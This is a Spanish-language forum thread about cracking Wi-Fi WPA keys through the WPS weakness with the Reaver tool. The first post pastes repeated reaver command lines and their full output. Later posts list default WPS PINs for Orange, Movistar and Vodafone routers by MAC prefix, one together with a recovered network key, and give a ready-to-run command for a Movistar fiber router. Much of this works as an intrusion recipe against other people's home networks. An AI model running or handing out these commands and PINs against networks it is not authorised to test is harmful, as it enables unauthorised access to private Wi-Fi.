REAVER: Vulnerabilidad de WPA por WPS habilitado

[diego121]

BUENAS TARDES AMIGOS, ESTE ES MI PRIMER BLOG EN ESTE FORO, Y LA RAZON ES QUE ESTOY INTENTANDO DESBLOQUEAR MI ROUTER PARA PROBAR EL REAVER Y APRENDER COMO FUNCIONA, YO CONOZCO EL PIN DE MI ROUTER, Y LO INTRODUZCO DIRECTAMENTE EN EL REAVER PARA QUE INTENTE EL HACKEO CON ESE PIN Y ME SAQUE LA CLAVE WPA, PERO NO ME ARROJA LA CORRECTA, ME ARROJA VARIAS CLAVES, Y CADA VES QUE INTENTO CON EL MISMO PIN, ME GENERA UNA CLAVE DIFERENTE A LA ANTERIOR, AQUI LES DEJO LA INFORMACION QUE ME ARROJA EL REAVER



CH  3 ][ Elapsed: 0 s ][ 2014-01-08 13:02                                     
                                                                               
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                               
90:F6:52:7A:63:E4  -79        3        0    0   1  54e. WPA2 CCMP   PSK  cyber
                                                                               
BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                 


root@bt:~/reaver-1.4/src# reaver -i mon0 -b 90:F6:52:7A:63:E4 -p 81431472 -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Switching mon0 to channel 1
Waiting for beacon from 90:F6:52:7A:63:E4
Associated with 90:F6:52:7A:63:E4 (ESSID: cybercafee)
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M1 message
Sending WSC NACK
Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Trying pin 81431472
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M5 message
Sending M6 message
Received M7 message
Sending WSC NACK
Sending WSC NACK
Pin cracked in 14 seconds
WPS PIN: '81431472'
WPA PSK: 'C6832BB21266060C1EA553998151D7DEA240C3C2DF499423A434AA268D38C57F'
AP SSID: 'Network-90f6527a63e4'
Nothing done, nothing to save.

root@bt:~/reaver-1.4/src# reaver -i mon0 -b 90:F6:52:7A:63:E4 -p 81431472 -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Switching mon0 to channel 1
Waiting for beacon from 90:F6:52:7A:63:E4
Associated with 90:F6:52:7A:63:E4 (ESSID: cybercafee)
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M1 message
Sending WSC NACK
Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M3 message
Sending WSC NACK
Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M5 message
Sending M6 message
Received M7 message
Sending WSC NACK
Sending WSC NACK
Pin cracked in 9 seconds
WPS PIN: '81431472'
WPA PSK: '2FDB811A0766E1F15BEC35C3260388F0F92FCA60C366BB4FFA99175E381C1D37'
AP SSID: 'Network-90f6527a63e4'
Nothing done, nothing to save.

root@bt:~/reaver-1.4/src# reaver -i mon0 -b 90:F6:52:7A:63:E4 -p 81431472 -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Switching mon0 to channel 1
Waiting for beacon from 90:F6:52:7A:63:E4
Associated with 90:F6:52:7A:63:E4 (ESSID: cybercafee)
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M1 message
Sending WSC NACK
Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M5 message
Sending M6 message
Received M7 message
Sending WSC NACK
Sending WSC NACK
Pin cracked in 5 seconds
WPS PIN: '81431472'
WPA PSK: '8356E5E5A03787955655BB8917A28CC9CFA981D489B56ECAC495A887291192FC'
AP SSID: 'Network-90f6527a63e4'
Nothing done, nothing to save.

root@bt:~/reaver-1.4/src# reaver -i mon0 -b 90:F6:52:7A:63:E4 -p 81431472 -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Switching mon0 to channel 1
Waiting for beacon from 90:F6:52:7A:63:E4
Associated with 90:F6:52:7A:63:E4 (ESSID: cybercafee)
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M5 message
Sending M6 message
Received M7 message
Sending WSC NACK
Sending WSC NACK
Pin cracked in 3 seconds
WPS PIN: '81431472'
WPA PSK: '7C032AE7BF305B26D0ED34D15C91A2E66E164642297FB45D2757C661F0BF08EA'
AP SSID: 'Network-90f6527a63e4'
Nothing done, nothing to save.

root@bt:~/reaver-1.4/src# reaver -i mon0 -b 90:F6:52:7A:63:E4 -p 81431472 -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Switching mon0 to channel 1
Waiting for beacon from 90:F6:52:7A:63:E4
Associated with 90:F6:52:7A:63:E4 (ESSID: cybercafee)
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M1 message
Sending WSC NACK
Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M5 message
Sending M6 message
Received M7 message
Sending WSC NACK
Sending WSC NACK
Pin cracked in 5 seconds
WPS PIN: '81431472'
WPA PSK: 'CEB036FA15449D1A1CADF7A4EF0EDF6C4014F941220991C6B77ACCACFB4FB501'
AP SSID: 'Network-90f6527a63e4'
Nothing done, nothing to save.

root@bt:~/reaver-1.4/src# reaver -i mon0 -b 90:F6:52:7A:63:E4 -p 81431472 -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Switching mon0 to channel 1
Waiting for beacon from 90:F6:52:7A:63:E4
Associated with 90:F6:52:7A:63:E4 (ESSID: cybercafee)
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M5 message
Sending M6 message
Received M7 message
Sending WSC NACK
Sending WSC NACK
Pin cracked in 3 seconds
WPS PIN: '81431472'
WPA PSK: 'D5DE748B839DE8E2DA70FDF84369BDA55851C11A5A703F3A72E14E5603002CCA'
AP SSID: 'Network-90f6527a63e4'
Nothing done, nothing to save.


DE FORMA TAL QUE EL REAVER NO ME HA ARROJADO LA CLAVE REAL DEL ROUTER, Y DONDE DICE AP SSID NO ME ARROJA EL NOMBRE DE MI RED REAL, ME SALE OTRA QUE NO ES Y DE PASO TAMBIEN CAMBIA A MEDIDA QUE INTENTO HACKEAR CON EL MISMO PIN

MI ROUTER ES UN TP-LINK TL-WR941N

SIENDO TODO POR AHORA ME GUSTARIA QUE ME AYUDARAN A SOLUCIONAR O SABER A QUE SE DEBE ESTA GENERACION DE CLAVE INCORRECTA, GRACIAS.

[efars20]

Hola a todos!
Soy nuevo en todo esto y mirando por foros he visto que aqui hay nivel.
El otro dia descargue wifislax 4.7 y me puse a hacer pruebas con el reaver. De vez en cuando me dice 10 failed connections in a row y tambien 25 successive start failures pero continua comprobando pins y el porcentage sigue aumentando. Que significan esos avisos? Podre vulnerar mi router?
Gracias de antemano chicos!

[ChimoC]

Buenas:

@efars: Hasta que no termine la comprobación (o bien se quede "pillado") tu router puede ser vulnerable

Saludos

ChimoC

[efars20]

Gracias ChimoC!  y a parte del reaver hay otros metodos con los que averiguar la contraseña? Es por que esto es muy lento...

[chemamontevideo]

wenas, alguien tiene informacion sobre este router nuevo de movistar, de los que ponen con la fibra optica?

FABRICANTE: Comtrend
SSID: MOVISTAR_XXXX
MAC: F8:8E:85
WPS: activado

[malomher]

Estos son los pin al 99% de tres router FTE:XXXX de Orange


20:2B:C1:XX:XX:XX        01239980   
CC:96:A0:XX:XX:XX         12349838      
CC:96:A0:XX:XX:XX         12349982


Ninguno soltó la contraseña WPA

¿a ver si a alguien se le ocurre algo?

[CAMARA123]

Essid: vodafoneXXXX

Bssid: 6A:96:BF:XX:XX:XX

Key: UVXSMTJJNHNSWL

Wps Pin: 73357643

[Bagauda]

WLAN_XXXX (Movistar)

8C:0C:A3:XX:XX:XX

wps pin: 92947343

Auditado con Reaver-mod

[NEXUS978]

wenas, alguien tiene informacion sobre este router nuevo de movistar, de los que ponen con la fibra optica?

FABRICANTE: Comtrend
SSID: MOVISTAR_XXXX
MAC: F8:8E:85
WPS: activado

Buenas:
He leido en varios sitios que el pin para ese router que citas es el  19117652

La linea de comando completa seria esta: reaver -i mon0 -b F8:8E:85:XX:XX:XX -p 19117652 -vv

Ahora..te comento, estamos probando un amigo y yo con su router y se queda al 90'91% y no avanza, no se si se le esta pasando a mas gente con estos routers de fibra optica.

[elmatador25]

Hola y saludos a todos, yo estoy utilizando la version de reaver 1.4 tarjeta alfa 1w realtek 8187L y cuando llega al 99.99% probando pines se cuelga y se queda ahí , que puede pasar, alguna solución,,,,, gracias a todos,,,,,,por egran foro,,,,,
[/quote]